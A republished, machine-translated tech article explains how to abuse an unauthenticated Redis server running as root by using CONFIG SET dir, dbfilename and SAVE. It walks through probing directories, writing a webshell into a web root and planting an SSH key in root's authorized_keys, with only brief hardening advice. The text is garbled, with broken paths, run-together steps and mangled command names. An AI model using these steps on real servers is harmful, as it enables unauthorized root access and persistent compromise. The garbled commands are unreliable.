Shulou(Shulou.com)06/01 Report--

Redis deployed on many servers is started with Root privileges so that you can use this Root to do a lot of super-privilege things. Because REDIS does not have a strict authorization management mechanism, we must not set it to 0.0.0.0 in deployment and it is best to use requirepass (although it is plaintext but at least increases the difficulty).

In this paper, we mainly use the two commands configsave provided by redis to complete our HACK. The tools with convenient functions are crooked and become a scourge.

A brief introduction to a few useful commands

Config set dir $path:

This command is configured to specify the "work path" of redis. The RDB and AOF files generated after that will be stored here.

Dbfilename $name:

The RDB file name defaults to "dump.rdb"

Save:

Persist the data in memory

Together, they can achieve the following interesting functions

1. Specify whether the folder exists

Config set dir / home/bob

If (error) ERR Changing directory: No such file or directory is returned, it means that the folder is not available.

If OK is returned, it means that this folder exists on the server and has been set as the folder saved by the memory snapshot.

It is best to flushdb 2.webshell before use, or flushall to clear the data in memory.

1.config set dir / opt/web/www # sets the directory of the website 2.config set dbfilename test.php # sets the file name to be saved 3.set "#" # our webshell4.save # persists memory to test.php

3. Access trust

1.cat ~ / .ssh/id_rsa.pub > ~ / foo.txt2.cat ~ / foo.txt | redis-x set hack # saves the contents of foo.txt as a string with KEY as hack 3.config set dir / root/.ssh/ # sets the .ssh folder 4.config set dbfilename authorized_keys5.save of root

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.